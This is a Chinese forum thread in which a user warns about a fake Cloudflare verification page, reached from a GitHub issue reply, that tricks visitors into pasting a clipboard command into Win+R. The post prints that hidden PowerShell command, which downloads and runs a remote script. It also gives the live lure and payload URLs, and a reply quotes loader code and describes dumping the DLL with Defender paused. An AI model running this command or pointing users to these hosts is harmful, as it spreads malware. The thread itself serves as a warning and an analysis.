一次险些中招的经历：伪装 Cloudflare 验证诱导运行恶意代码

请勿点击以下链接或运行任何相关代码，可能导致电脑遭受攻击！！！

今天遇到了一件非常值得警惕的事情，希望分享出来提醒大家。我在浏览 GitHub issue 时，从回复中点击了一个链接：https://newrides.es/captha/cap/。页面显示的是一个看似正常的 Cloudflare 验证框，当时没多想就点击了按钮。

然而，验证却提示我的浏览器不支持，并引导我点击一个 Fix it! 按钮。我立马点击了这个按钮。紧接着，网站弹出了以下三步指示：

1. 按 Win+R按钮
2. 按Ctrl+V按钮
3. 按Enter按钮

就在这时，网站悄悄地往我的剪贴板里复制了一段 PowerShell 代码：

powershell -WindowStyle Hidden -Command ([ScriptBlock]::Create((irm http://customamusement.com/pagecable/guardoffice))).Invoke()

我立刻意识到这是一个 PowerShell 脚本，其作用是静默下载并执行来自 http://customamusement.com/pagecable/guardoffice 的远程脚本。这极有可能是一个木马程序或者后门！

出于好奇，我打开了远程链接查看了代码，发现内容是从 http://customamusement.com/pagecable/walkbutter 下载一个文件并执行，但是这个文件经过 RC4 加密，直接查看内容是乱码，短时间内难以分析其具体恶意行为，感兴趣的f友可以分析一下。

之所以发这个帖子，是因为这种攻击手法非常狡猾，利用了用户对 Cloudflare 验证的信任以及急于解决问题的心理，极易被用于传播木马、后门或其他恶意软件。我幸运地在执行 Enter 那一步停了下来，但很多不熟悉计算机的用户很可能会毫无防备地运行这段代码，或者仅仅因为好奇点击了链接，从而导致电脑被入侵。

到最后这两步感觉手法也太挫劣了，第一步整个页面看着也不像正常网站

nextdns 很快哈 https://ibb.co/F4k5nPHK

昨天有个帖子发了 github 里面 issue 回复中的病毒 https://fex.com/t/1124608 感觉一波钓鱼小爆发，等 github 反应过来集中清理吧

很多 steam 假入库也是这样搞的, 给你塞个 dll 然后魔改 steam

不需要多复杂的分析，那个 RC4 加密是无意义的，因为代码里提供了密钥。 guardoffice 里面删除 $puritynote = [System.AppDomain]::CurrentDomain.Load($solutionlens) if ($puritynote.EntryPoint -ne $null) { $puritynote.EntryPoint.Invoke($null, @(@())) } 之后的代码就是安全的了（不会执行没看见的代码），执行这部分得到 $solutionlens 是一个 byte[]，于是 [System.IO.File]::WriteAllBytes('C:\walkbutter.dll', $solutionlens) 你会发现 Defender 立刻告诉你这是病毒。暂停 Defender ，重新保存一次，然后用 ILSpy 查看，会发现是混淆过的代码。 到这里我就没有继续往下看了，不值得。

@geelaw #5 Just to be safe, 当你想要复现这个步骤的时候，请不要直接无脑仅仅删除我提到的片段，因为 guardoffice 里面的内容不受控，随时可能变化——一种可能的变化是，代码变得：即使你删除了我提到的片段，仍然不安全。 我的建议是不要在非受控环境下访问 guardoffice ，以及，如果你访问之后看不懂代码，不要去尝试运行。